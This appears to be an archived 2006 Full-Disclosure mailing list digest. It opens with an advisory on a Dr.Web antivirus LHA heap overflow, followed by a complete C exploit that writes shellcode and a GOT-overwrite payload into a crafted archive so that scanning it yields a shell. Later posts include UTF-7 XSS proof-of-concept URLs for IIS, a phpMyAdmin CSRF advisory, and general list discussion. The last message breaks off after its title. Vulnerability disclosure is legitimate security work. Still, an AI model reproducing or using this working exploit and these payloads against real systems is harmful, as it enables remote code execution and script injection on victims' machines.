From jean-sebastien at guay-leroux.com Wed Oct 4 02:48:09 2006 From: jean-sebastien at guay-leroux.com (=?ISO-8859-1?Q?Jean-S=E9bastien_Guay-Leroux?=) Date: Tue, 03 Oct 2006 21:48:09 -0400 Subject: [Full-disclosure] Dr.Web 4.33 antivirus LHA long directory name heap overflow Message-ID: <452312D9.5040107@guay-leroux.com> Topic: Dr.Web 4.33 antivirus LHA long directory name heap overflow Announced: 2006-09-19 Product: Dr.Web antivirus Vendor: http://www.drweb.com/ Impact: Code execution Affected product: Dr.Web 4.33, probably earlier versions also Credits: Jean-S?bastien Guay-Leroux CVE ID: CVE-2006-4438 I. BACKGROUND Dr.Web, a new generation of a virus scanner, searches and kills file and boot viruses, as well as combination viruses, which infect both files and boot sectors. The SpIDer intercepts all attempts to access files and disk system areas and checks them for viruses "on-the-fly" first. Having detected a virus, SpIDer removes or locks it, granting access to the infected file only if it has been successfully cured. A highlight of Dr.Web that differ it from other scanners is the heuristic analyzer along with the traditional mechanism for detecting viruses by signatures (a specific byte string in the virus code that definitely identifies the virus). Updates for new virus-extensions online via Internet o Available for following systems: o Windows 9x, Me, XP, 2000, 2003 o LINUX o FreeBSD, OpenBSD o Solaris o Novell o OS/2 II. DESCRIPTION When building a special LHA archive with a long directory name in an extended directory header, a fixed size buffer on the heap is overflowed. When processing this malicious archive, it is then possible to make Dr.Web run arbitrary code by overwriting some internal malloc management informations. III. IMPACT Denial of service and possibly code execution. IV. EXPLOIT A working exploit version was developped for Dr.Web (R) Scanner for Linux v4.33 (4.33.0.09211). See appendix 1. V. SOLUTION The vendor did not provide any patch or workarounds for this security flaw. It is suggested to either change your antivirus software or to disable archive scanning until the vendor releases a patch. Disabling archive scanning greatly reduces DrWeb's power to detect viruses. To disable it, you need to modify drweb.ini and change the "CheckArchives" line to: CheckArchives = No VI. CREDITS Vulnerability was discovered by Jean-Seastien Guay-Leroux. VII. TIMELINE 2006-04-xx : Bug is discovered (I don't remember when exactly :-) 2006-08-11 : Proof of concept code is written. 2006-08-25 : Vendor is notified via security at drweb.com and support at drweb.com. 2006-08-29 : Vendor says the bug was submitted to the developpers for review. 2006-09-05 : Vendor is asked to provide an update on the bug. 2006-09-06 : Vendor says the request has been forwarded to the developpers. 2006-09-11 : Vendor is asked, again, to provide an update on the bug. 2006-09-11 : Vendor replies with : "Sorry, no action yet." 2006-09-19 : Advisory is published. VIII. APPENDIX 1 /******************************************************************** stetoscope.c: Dr.Web 4.33 antivirus LHA directory name heap overflow for linux - Howto: Find a valid GOT entry to hijack with objdump -R /opt/drweb/drweb . I guess that you can use the address of free(), but my exploit uses the address of realpath(). There was a NULL byte in the GOT entry of free() so I had to find something else ;-) Calling the exploit will produce a file. Scan this file with a vulnerable version of drweb and you will, hopefully, get a shell :-) Good luck! - Exploit particularities: - There is a NOP sled using \xeb\x0a . Increases exploit reliability - 0xff and 0x00 are filtered caracters - Bypass some malloc security checks added in malloc.c: Little security check which won't hurt performance: the allocator never wrapps around at the end of the address space. Therefore we can exclude some size values which might appear here by accident or by "design" from some intruder. This thread helped me a lot :-) : http://archives.neohapsis.com/archives/dailydave/2006- q1/thread.html#149 - Shellcode took from Metasploit's shellcode generator. - Coded by: Jean-Sebastien Guay-Leroux http://www.guay-leroux.com *********************************************************************/ #include #include #include #include // Base structure of a LHA file #define I_HEADER_SIZE 0 #define I_HEADER_CHECKSUM 1 #define I_METHOD 2 #define I_PACKED_SIZE 7 #define I_ORIGINAL_SIZE 11 #define I_LAST_MODIFIED_STAMP 15 #define I_ATTRIBUTE 19 #define I_HEADER_LEVEL 20 #define I_NAME_LENGTH 21 #define I_NAME 22 #define I_CRC 26 #define I_EXTEND_TYPE 28 // Extended structure of a LHA file #define E_HEADER_SIZE 0 #define E_HEADER_TYPE 2 #define E_HEADER_NAME 3 #define DEBUG 0 unsigned char shellcode1[] = "\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" "\x11\x22\xdf\x83\xeb\xfc\xe2\xf4\x62\x1a\x7a\x46\x5a\x77\x4a\xf2" "\x6b\x98\xc5\xb7\x27\x62\x4a\xdf\x60\x3e\x40\xb6\x66\x98\xc1\x8d" "\xe0\x19\x22\xdf\x08\x3e\x40\xb6\x66\x3e\x51\xb7\x08\x46\x71\x56" "\xe9\xdc\xa2\xdf"; FILE * open_file (char *filename) { FILE *fp; fp = fopen ( filename , "w" ); if (!fp) { perror ("Cant open file"); exit (-1); } return fp; } void put_byte (char *ptr, unsigned char data) { *ptr = data; } void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); } void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); } void usage (char *progname) { printf ("\nTo use:\n"); printf ("%s \n\n", progname); printf ("Example: %s 0x08080114 0x081C63F8 LHA_dir\n\n", progname); exit (-1); } int main (int argc, char *argv[]) { FILE *fp; char *hdr = (char *) malloc (4096), *ptr; int header_size; int written_bytes; int total_size; unsigned int retloc, retaddr; char *filename = (char *) malloc (256); int i; if (!hdr) { perror ("Error allocating memory"); exit (-1); } if ( argc != 4) { usage ( argv[0] ); } // parse arguments sscanf (argv[1], "0x%x", &retloc); sscanf (argv[2], "0x%x", &retaddr); strncpy (filename, argv[3], 255); memset (hdr, 0, 4096); // base header header_size = 29; put_byte (hdr + I_HEADER_SIZE, header_size); put_byte (hdr + I_HEADER_CHECKSUM, 83); memcpy (hdr + I_METHOD, "-lh0-", 5); // No compression... put_longword (hdr + I_PACKED_SIZE, 0x1234); put_longword (hdr + I_ORIGINAL_SIZE, 0x1234); put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234); put_byte (hdr + I_ATTRIBUTE, 0x20); put_byte (hdr + I_HEADER_LEVEL, 0x01); put_byte (hdr + I_NAME_LENGTH, 0x04); put_longword (hdr + I_NAME, 0x90909090); put_word (hdr + I_CRC, 0x6666); put_byte (hdr + I_EXTEND_TYPE, 0x55); // Unix filesystem. // extended header put_word (hdr + header_size + E_HEADER_SIZE, 285); put_byte (hdr + header_size + E_HEADER_TYPE, 0x2); // Build our payload memset (hdr + header_size + E_HEADER_NAME, 0x41, 266); for (i = 0, ptr = hdr + header_size + E_HEADER_NAME; i < (240 - strlen (shellcode1) - 10);) { ptr[i++] = 0xeb; ptr[i++] = 0x0a; } for (; i < (240 - strlen (shellcode1));) { ptr[i++]=0x90; } memcpy (hdr + header_size + E_HEADER_NAME + 240 - strlen (shellcode1), shellcode1, strlen(shellcode1)); put_longword (hdr + header_size + E_HEADER_NAME + 266, 0x41414141); put_longword (hdr + header_size + E_HEADER_NAME + 270, 0xB7E34CC2); put_longword (hdr + header_size + E_HEADER_NAME + 274, retloc - 0xc); put_longword (hdr + header_size + E_HEADER_NAME + 278, retaddr); // Size of next extended header is 0 put_word (hdr + header_size + E_HEADER_NAME + 282, 0x0000); total_size = (header_size + 284 + E_HEADER_NAME); fp = open_file (filename); if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { if (DEBUG) printf ("%d bytes written\n", written_bytes); } else { perror ("Cant write to the file\n"); } fclose (fp); return 0; } From jfeise at feise.com Sun Oct 1 00:12:12 2006 From: jfeise at feise.com (Joe Feise) Date: Sat, 30 Sep 2006 16:12:12 -0700 Subject: [Full-disclosure] end of the interent ? In-Reply-To: <8f1f7b60609291310m43c7742i58d36ca6552c6b8d@mail.gmail.com> References: <8f1f7b60609291310m43c7742i58d36ca6552c6b8d@mail.gmail.com> Message-ID: <451EF9CC.1060003@feise.com> Peter Dawson wrote on 09/29/06 13:10: > I had to share this wierd err > > http://www.google.com/reader/next?go=noitems There are a bunch more of these kinds of pages. The first one I encountered, ca. 1998, was on opaldata.com (now defunct): http://web.archive.org/web/19981202171631/http://opaldata.com/the_end/index.html -Joe From atoom.tonijn at gmail.com Sun Oct 1 01:33:13 2006 From: atoom.tonijn at gmail.com (=?ISO-2022-JP?B?GyRCJV4lMCVtODY7UhsoQg==?=) Date: Sun, 1 Oct 2006 02:33:13 +0200 Subject: [Full-disclosure] Stealing Search Engine Queries with JavaScript In-Reply-To: <631ac1d90609291417q7c5bdfc0o8c89c0b7067cd6ee@mail.gmail.com> References: <631ac1d90609291417q7c5bdfc0o8c89c0b7067cd6ee@mail.gmail.com> Message-ID: <6afa549f0609301733k55053c5ci1da6fa362e5a559f@mail.gmail.com> Do a barrel roll. Nyoro~n -------------- next part -------------- A non-text attachment was scrubbed... Name: cat-watch.jpg Type: image/jpeg Size: 64946 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061001/fe19ecb2/attachment.jpg From atoom.tonijn at gmail.com Sun Oct 1 01:26:21 2006 From: atoom.tonijn at gmail.com (=?ISO-2022-JP?B?GyRCJV4lMCVtODY7UhsoQg==?=) Date: Sun, 1 Oct 2006 02:26:21 +0200 Subject: [Full-disclosure] Stealing Search Engine Queries with JavaScript In-Reply-To: References: <91EBC35A21D8D041BB9496B76F9E747D11E708AF@mcbain.spidynamics.com> Message-ID: <6afa549f0609301726u6eb63d8dxd761ab6e295eb86f@mail.gmail.com> Doesn't work in Opera (9.02) or maybe I'm doing something wrong. Nyoro~n From tyoptyop at gmail.com Sun Oct 1 01:58:48 2006 From: tyoptyop at gmail.com (Tyop?) Date: Sun, 1 Oct 2006 02:58:48 +0200 Subject: [Full-disclosure] Security Rss Feeds In-Reply-To: <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com> References: <41011d980609300951r29d9058cga20091fb302fec47@mail.gmail.com> <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com> Message-ID: <985b1a3d0609301758p23b5e3c3he87bbe140e43d6f0@mail.gmail.com> > http://portal.spidynamics.com/blogs/msutton/rss.aspx > http://ha.ckers.org/blog/feed/ > > > > > > > > > > > > < http://www.avertlabs.com/research/blog> > > > > < http://blogs.technet.com/msrc/default.aspx> > > > > > > < http://www.securityfocus.com/> I add one more News/ http://blogs.securiteam.com/index.php/feed/ Last Exploits on the wild/ http://www.metasploit.org/projects/Framework/updates/rss.html http://www.milw0rm.com/rss.php -- Tyop? From ptrs-ejy at bp.iij4u.or.jp Sun Oct 1 05:00:37 2006 From: ptrs-ejy at bp.iij4u.or.jp (Eiji James Yoshida) Date: Sun, 1 Oct 2006 13:00:37 +0900 Subject: [Full-disclosure] Microsoft Internet Information Services UTF-7 XSS Vulnerability [MS06-053] Message-ID: <000101c6e50e$27137fd0$6401a8c0@Zarathustra> + Title: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft Internet Information Services UTF-7 XSS Vulnerability [http://www.geocities.jp/ptrs_sec/advisory09e.html] + Date: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1 October 2006 + Author: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Eiji James Yoshida [ptrs-ejy at bp.iij4u.or.jp] + Risk: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Medium + Vulnerable: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Internet Information Services + Overview: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Using UTF-7 encoded URLs, IIS may return user specified content to the browser. If 'Encoding' is set to 'Auto Select', and Internet Explorer finds a UTF-7 string in the response's body, it will set the charset encoding to UTF-7 automatically, unless a certain charset encoding is already enforced. + Proof of concept: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction='' http://MaliciousSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-+AC8-SCRIPT+AD4-.ida UTF-7("<") = +ADw-, +ADx-, +ADy-, +ADz- UTF-7(">") = +AD4-, +AD5-, +AD6-, +AD7- UTF-7("/") = +AC8-, +AC9- + Patch: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft Security Bulletin MS06-053 Vulnerability in Indexing Service Could Allow Cross-Site Scripting (920685) [http://www.microsoft.com/technet/security/bulletin/ms06-053.mspx] + Vendor status: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ IPA/ISEC was notified on the 27th December 2005. Microsoft has released a patch for this vulnerability on the 12th September 2006. + Similar vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ XSS vulnerabilities in Google.com [http://www.watchfire.com/securityzone/advisories/12-21-05.aspx] Microsoft Security Bulletin (MS00-084) Patch Available for 'Indexing Services Cross Site Scripting' [http://www.microsoft.com/technet/security/bulletin/ms00-084.mspx] ------------------------------------------------- Eiji James Yoshida penetration technique research site E-mail: ptrs-ejy at bp.iij4u.or.jp URL: http://www.geocities.jp/ptrs_sec/index.htm ------------------------------------------------- From wk at c4i.org Sun Oct 1 06:45:05 2006 From: wk at c4i.org (William Knowles) Date: Sun, 1 Oct 2006 00:45:05 -0500 (CDT) Subject: [Full-disclosure] Security Rss Feeds Message-ID: On September 30, 2006 10:21:51 PM +0530 men in black helicopters working for the Greys forced crazy frog crazy frog to write: > Hi, > > Please share various security related rss feeds you read daily. > > Thanks, > -CF Save the trouble of looking at a number of security news feeds, let InfoSec News do all heavy lifting for you! http://www.infosecnews.org/ Cheers! William Knowles wk at c4i.org *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ================================================================ C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From bugtraq at cgisecurity.net Sun Oct 1 01:05:21 2006 From: bugtraq at cgisecurity.net (bugtraq at cgisecurity.net) Date: Sat, 30 Sep 2006 20:05:21 -0400 (EDT) Subject: [Full-disclosure] Security Rss Feeds In-Reply-To: <8f1f7b60609301405v354994fbu15e967e30ecd7244@mail.gmail.com> Message-ID: <20061001000521.23421.qmail@cgisecurity.net> Add http://www.cgisecurity.com/index.rss as well ;p -z > > --===============1915392881== > Content-Type: multipart/alternative; > boundary="----=_Part_36651_2419662.1159650305531" > > ------=_Part_36651_2419662.1159650305531 > Content-Type: text/plain; charset=UTF-8; format=flowed > Content-Transfer-Encoding: 7bit > Content-Disposition: inline > > Add two more to that list > > http://portal.spidynamics.com/blogs/msutton/rss.aspx > http://ha.ckers.org/blog/feed/ > > Paul, thanks for the new add's to me reader :)- From securityproof at gmail.com Sun Oct 1 17:06:44 2006 From: securityproof at gmail.com (securityproof) Date: Mon, 2 Oct 2006 01:06:44 +0900 Subject: [Full-disclosure] "POC 2006" by Korean hackers Message-ID: <001701c6e573$9a4cec10$6819c4d3@FREE2> The first international hacking & security conference by Korean hackers will be held in November 16 ~ 17. The conference is "POC 2006". POC means 'power of community'. We believe that the power of community can make the world safer. "POC 2006" hates just theoretical discussion. "POC 2006" concentrates on technical and creative discussion and will show real hacking and security process. There are two sections in "POC 2006". One is 'Open Source' section. Through this, new hacking and security tools will be introduced. The other is technical presentation, in which new hacking and security techniques will be opened to the world. You won't be disappointed at them. And you can have a chance to meet brilliant Korean hackers who are not well-known to the world. The keynote speaker is Richard Stallman. He will speak "Copyright vs Community in the Age of Computer Networks". Technical section speakers and their topics are as follows: * Jerry, "Virtualization Techinque for the Security of Web and Application" * Grugq, "VoIP Hacking: " * Han Chang kyu, "The Way and Process to Analyze Polymorphic Virus" * Ryan, "ActiveX Control and Web Application Security" * Loafer, "The New Way to Protect from Runtime Format String Attacks through the Modifying of printf() functions Call Code" * wooyaggo, "New Kernel Exploitation Technique on Linux 2.6.x" * George Neville-Neil, "Network Protocol Security Testing with the Packet Construction" * Xpl017Elz, "The New Ways to Attack Applications of Operating Systems under Execshield" * Lukas Grunwald, "Attacking RFID Access-, Identify- and Ticketing- Cards" * Secret, "Hacking the Automobile Electronic Control Unit" * SunBing, "How to Implement a Virtual Machine Based Rootkit" You can check the detailed information in "http://www.powerofcommunity.net". All the speakers will publish Phrack style's articles. If you register and visit our con, you can have a book which contains the detailed articles of the topics. The book will be given only on-site. Kind Regards, POC 2006 http://www.powerofcommunity.net -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061002/17f5a2ef/attachment.html From sil at infiltrated.net Sun Oct 1 18:28:41 2006 From: sil at infiltrated.net (J. Oquendo) Date: Sun, 1 Oct 2006 12:28:41 -0500 Subject: [Full-disclosure] Truths in "Truth in Caller ID Act" Message-ID: <20061001172841.GB15007@infiltrated.net> So the United States government wants to pass the "Truth in Caller ID" act. Humorously it will do little do deter criminals from spoofing their caller ID and scamming innocent victims. Here is the rule/law followed by why it will fail: "It shall be unlawful for any person within the United States, in connection with any telecommunications service or VOIP service, to cause any caller identification service to transmit misleading or inaccurate caller identification information, with the intent to defraud or cause harm." Re-read it a few times and let some common sense kick in. "unlawful for any person within the United States, in connection with any telecommunications service or VOIP service, to cause any caller identification service to transmit misleading or inaccurate caller identification information" What in this bill exactly deters someone from abroad to continue their activities? Firstly they're not bound by U.S. laws, secondly if their servers are abroad those servers are in their lawful means to do what is legally appropriate for their location. Now argumentatively how will the United States seek to prosecute say a telemarketer from using a service abroad to traverse back into the U.S.? Let's re-read the letter of the law again shall we? "unlawful for any person within the United States, etc., etc., to cause any caller identification, etc., etc." So how does caller ID change, is it cause by the telemarketer, the server sending out the caller ID information, or the provider of that server. Obviously the telemarketer led the server to change the information, but ultimately the provider dished out the number, hence the provider being the true culprit. The more I read about this law/rule/prohibition, the more I scratch my head at it. So let's now see how the government intends on tracking someone shall we? CallerIDBusterFoobar.com is a server located in Moscow. They're hosted there, their provider is their, their uplink is in Russia, etc. Joe Smith is a scumbag thief interested in stealing the credit card information of a "few good men". He lives in Boondock Arizona and spends much too much time thinking up scams. He signs up for an account at CallerIDBusterFoobar.com, assigns 800-DISCOVER as his caller ID and proceeds to scam countless people out of their information. With this information he sets up fradulent drops and pickups somewhere in Moldovia. How will U.S. authorities track him down? They won't. They don't have access to the servers in Russia for starters, secondly how many people are reporting these crimes. Alright, let's be fair for a moment, someone at Discover "discovers" that the call actually originated from Russia. So what? Unless the foreign country is cooperating with U.S. authorities, there is little the United States government with all their so called legislation would be able to do. Now let's take it a step further, Joe Smith decided to use Privoxy with a WiFi phone from an open network. He managed to steal a VoIP account while scanning a class A for port 5060 and leveraged someone's information. He always has used Tor and Privoxy on his personal distro of Linux on a CD so he knows that there will be no residue from his crimes due to him using this CD on this machine so he is scott free technologically. How does the United States intend on stopping him again? I get it now, since the United States government in all of their mighty wisdom is passing this bill it is only obvious that criminals are going to respect U.S. laws, I mean after all those in government follow their own laws so why shouldn't a criminal. Comments, criticism? -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil infiltrated . net http://www.infiltrated.net "How a man plays the game shows something of his character - how he loses shows all" - Mr. Luckey From sil at infiltrated.net Sun Oct 1 19:41:56 2006 From: sil at infiltrated.net (J. Oquendo) Date: Sun, 1 Oct 2006 13:41:56 -0500 Subject: [Full-disclosure] Truths in "Truth in Caller ID Act" Message-ID: <20061001184156.GA15403@infiltrated.net> Valdis.Kletnieks at vt.edu wrote: > You mis-read the legalese. > "It shall be unlawful for any person within the United States" Define within the United States. The person, the server, the provider or all three. I don't believe it's misread it's to the letter of the law. So again step by step... "It shall be unlawful for any person within the United States, in connection with any telecommunications service or VOIP service..." 1) Teleco/VoIP service is out of bounds here. 2) The User who initiated the command is logged from an address somewhere over the rainbow (Tor+Privoxy). 3) "within the United States" which? The person, or the telco/VoIP provider? Does it have to be both - person and provider. Sounds broad to me. Can't be single sided here. So I decide to offer a service to say rape victims who want to remain anonymous, a victim decides to use "Jane Smith" <2035551212>, she is calling from say the British Virgin Islands where she was raped by a congressman. She doesn't want her identity known, but would like counseling over the phone. 1) She is in the British Virgin Islands so technically she is not breaking the law. 2) Me being the provider, I didn't initiate the spoof, I provided a service. Should I be held accountable for upholding the right to privacy? 3) Sure caller ID blocking could have been used, it still could be traced. Let's take the case of someone blowing the whistle on government corruption. History has shown their life will be ruined. This is a great avenue worry free to make a report yet at the same time if I decided to set my caller ID as that of the White House, I'm sure I can con a reporter to report something bogus. Dual edged sword. What will be next outlawing telco service unless it passes through DCS100 along with a photo and fingerprint at Fort Meade. -- =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743 sil infiltrated . net http://www.infiltrated.net "How a man plays the game shows something of his character - how he loses shows all" - Mr. Luckey From sesser at hardened-php.net Sun Oct 1 18:59:18 2006 From: sesser at hardened-php.net (Stefan Esser) Date: Sun, 1 Oct 2006 19:59:18 +0200 Subject: [Full-disclosure] Advisory 07/2006: phpMyAdmin Multiple CSRF Vulnerabilities Message-ID: <20061001175918.GA4724@hardened-php.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: phpMyAdmin Multiple CSRF Vulnerabilities Release Date: 2006/10/01 Last Modified: 2006/10/01 Author: Stefan Esser [sesser at hardened-php.net] Application: phpMyAdmin <= 2.9.0 Severity: Multiple vulnerabilities within phpMyAdmin allow bypassing it's protection against CSRF Risk: Medium Critical Vendor Status: Vendor has a released an updated version References: http://www.hardened-php.net/advisory_072006.130.html Overview: Quote from http://www.phpmyadmin.net "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields, manage privileges, export data into various formats and is available in 50 languages." During an audit of phpMyAdmin's protection against CSRF: Cross Site Request Forgeries we discovered that there were multiple ways to bypass the protection. The failure of phpMyAdmin's CSRF protection obviously means that a potential attacker can use CSRF attacks to trick the browser of a phpMyAdmin user to execute any kind of SQL queries on the victims database server. Details: phpMyAdmin uses a random token that is stored within the user's session to protect against Cross Site Request Forgeries. CSRF basically means that a website tricks the browser of a visiting user into issuing HTTP requests against another site that does ensure, that the request was intended. In case of phpMyAdmin a CSRF vulnerability obviously means that another site could trick the browser of a phpMyAdmin user into issuing arbitrary SQL queries against his database. In phpMyAdmin the CSRF protection works like this 1) Start PHP's Session Handling 2) Is there already a token assigned to the session? -> No: create a random token 3) Is supplied token equal to session token? -> No: unset() all request variables not in white-list While this design could actually work the implementation in phpMyAdmin was vulnerable to multiple attacks because before and during the 3 steps mentioned several modifications to the request variable arrays are made and these variables get globalised. (This is done within the PHP code and has nothing to do with register_globals) The attacks we found attack different phases of the CSRF protection. The following is an overview of the vulnerabilities within the 3 phases. For each phase several different attacks are possible. Several of the attacks require GPC variables with names that are equal to PHP's superglobals, therefore these attacks are automatically stopped by our Suhosin extension. [-- Token Verification --] The token verification could be tricked because there existed several flaws in the globalisation routine that allowed destroying the content of the session variables. Additionally the special handling of session variables during while register_globals is activated allowed directly setting the session token from within the URL. Obviously it is very easy to "guess" the required token when the token is empty or is set to a value of his choice. [-- Determine which variables to unset --] The _REQUEST array was used to determine which variables should be unset() but phpMyAdmin contained intended and unintended ways that allowed overwriting the content of the _REQUEST array. In the new version all GPC arrays are used for this process and the unintended way to destroy superglobal arrays within the globalisation was closed. [-- Unset variables --] Unset() is a dangerous function because older PHP versions (that are still installed on most servers) contained vulnerabilities that allowed bypassing it. For further information take a look at: http://www.hardened-php.net/critical_php_vulnerability_explained.124.html Proof of Concept: The Hardened-PHP Project is not going to release exploits for this vulnerability to the public. Disclosure Timeline: 23. September 2006 - Contacted phpMyAdmin developers by email 01. October 2006 - Updated phpMyAdmin was released 01. October 2006 - Public Disclosure Recommendation: It is strongly recommended to upgrade to the newest version of phpMyAdmin 2.9.0.1 which you can download at: http://www.phpmyadmin.net/home_page/downloads.php As usual we very strongly recommend to install our Suhosin PHP extension. It disallows request variables with the same name as PHP superglobal arrays. This stops several of the attacks described in this advisory. Grab your copy and more information at: http://www.hardened-php.net/suhosin/index.html GPG-Key: http://www.hardened-php.net/hardened-php-signature-key.asc pub 1024D/0A864AA1 2004-04-17 Hardened-PHP Signature Key Key fingerprint = 066F A6D0 E57E 9936 9082 7E52 4439 14CC 0A86 4AA1 Copyright 2006 Stefan Esser. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFFIA0sRDkUzAqGSqERAkvZAKDUgtJio2X8pXqW82tGrBVDTZ7giwCfV00p 9VZ7BjLg4UkiO7WC8RohqOo= =+flk -----END PGP SIGNATURE----- From Valdis.Kletnieks at vt.edu Sun Oct 1 18:59:40 2006 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sun, 01 Oct 2006 13:59:40 -0400 Subject: [Full-disclosure] Truths in "Truth in Caller ID Act" In-Reply-To: Your message of "Sun, 01 Oct 2006 12:28:41 CDT." <20061001172841.GB15007@infiltrated.net> References: <20061001172841.GB15007@infiltrated.net> Message-ID: <200610011759.k91Hxfwa001562@turing-police.cc.vt.edu> On Sun, 01 Oct 2006 12:28:41 CDT, "J. Oquendo" said: > Now argumentatively how will the United States seek to prosecute say a > telemarketer from using a service abroad to traverse back into the U.S.? Let's > re-read the letter of the law again shall we? "unlawful for any person within > the United States, etc., etc., to cause any caller identification, etc., etc." > So how does caller ID change, is it cause by the telemarketer, the server > sending out the caller ID information, or the provider of that server. > Obviously the telemarketer led the server to change the information, but > ultimately the provider dished out the number, hence the provider being the > true culprit. You mis-read the legalese. "unlawful for any person... to cause.." is the important text here. That means "If you did something that as an end result made it happen, you're in trouble". If you're in Pensacola, Florida, and issued a command that led to a server in Moscow, Russia generating a bogus caller-ID, then you caused it to happen, and it doesn't matter where/how it *actually* goes down. > How will U.S. authorities track him down? They won't. In general, these things usually succumb to a "follow the money" investigation. If the fraudster in Pensacola collected any money, he can be tracked down that way. Also, the intent here isn't to give the LEOs new ways to track down the crooks, it's giving them new ways to *lock them up*. Let's say they do their "follow the money" thing, and they *know* that Joe Foobar did it. However, some of their evidence and methods are a bit... ummm.... "unconventional", and likely to not hold up if it goes to a jury trial, after all the motions to suppress evidence and so on. However, they *do* have rock-solid proof that Foobar did in fact forge caller-IDs as part of the scam. So you send him up the river for 3 to 5 on 23 counts of forged caller-ID. Remember - Al Capone never got convicted of any of the evil things everybody knows he did. He ended up in the slammer for income tax evasion.... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061001/71a825fe/attachment.bin From nobody at cypherpunks.to Sun Oct 1 18:05:13 2006 From: nobody at cypherpunks.to (Anonymous via the Cypherpunks Tonga Remailer) Date: Sun, 1 Oct 2006 19:05:13 +0200 (CEST) Subject: [Full-disclosure] FON (fon.com) - Crappy security policy part II Message-ID: <20061001170513.6C8661712B@mail.cypherpunks.to> FON (www.fon.com) is some semi-free wifi service. Members contribute their connection and allow other FON users to use their connections for free or small money (depends, the users have to contribute their connection to get free access). Although the users have to identify at the hotspot, we have problem #1: =========== The police would'nt care that you share your internet connection when they find your IP in some logs related to hacking, copyright issues, child porn or whatever. They will first confiscate your equipment and ask then. problem #2: =========== It is or was possible to steal anyone's credentials: http://fon.freddy.eu.org/pcap-decoder/howto/ problem #3: =========== At the time, when I realized the existance of FON, it was possible to register with fake e-mail addresses, because they had a lame verification mechanism (something like http://fon.com/verify.php?email=president at whitehouse.gov). I successfully registered dozens of fake accounts that way and all these accounts still work. At least that hole has been fixed in the meantime. However. Although problem #2 has been made public, no "please set a new password" requests have been sent to the subscribers. Although they seem to know that they had problem #3 (otherwise they would'nt have fixed it), they did no approach to *verify* their user identies (my "regular" FON account has not been verified and my fake accounts still work). From thor at polypath.com Sun Oct 1 20:20:20 2006 From: thor at polypath.com (Thor Larholm) Date: Sun, 01 Oct 2006 21:20:20 +0200 Subject: [Full-disclosure] 0day in Firefox from ToorCon '06 Message-ID: <452014F4.6010901@polypath.com> CNet is writing about some 0day vulnerabilities in Firefox that were demonstrated at ToorCon '06 by Mischa Spiegelmock and Andrew Wbeelsoi: http://news.zdnet.com/2100-1009_22-6121608.html Mischa and Andrew also claim to have found about 30 0day vulnerabilities in Firefox. The article mention that the vulnerabilities from the presentation are specific to Firefox's implementation of Javascript and hints that they are stack overflows. On the other hand, the recent security-related Mozilla commits following the presentation deal with improper validation of scope chain lookups in jsxml.c, jsinterp.c and jsiter.c, which could allow injecting content into the Chrome context. We'll probably see a security release of Firefox in the next week, but in the mean time I have put a couple of links to the code diff's that fix these vulnerabilities at http://blogs.securiteam.com/index.php/archives/657 -- Thor Larholm From joe at pjprimer.com Sun Oct 1 21:48:25 2006 From: joe at pjprimer.com (Joe Barr) Date: Sun, 01 Oct 2006 15:48:25 -0500 Subject: [Full-disclosure] Truths in "Truth in Caller ID Act" In-Reply-To: <20061001172841.GB15007@infiltrated.net> References: <20061001172841.GB15007@infiltrated.net> Message-ID: <1159735705.4494.163.camel@localhost> On Sun, 2006-10-01 at 12:28 -0500, J. Oquendo wrote: > So the United States government wants to pass the "Truth in Caller ID" > act. Humorously it will do little do deter criminals from spoofing > their caller ID and scamming innocent victims. Here is the rule/law > followed by why it will fail: The U.S. government will do its duty, that is to say, they will lick the ass of the telecommunications industry lobbyists and do whatever they damn well say. -- It's a strange world when proprietary software is not worth stealing, but free software is. From dh at layereddefense.com Sun Oct 1 23:10:11 2006 From: dh at layereddefense.com (Deral Heiland) Date: Sun, 01 Oct 2006 18:10:11 -0400 Subject: [Full-disclosure] Layered Defense Advisory: TrendMicro OfficesScan Corporate Edition Format String Vulnerability Message-ID: 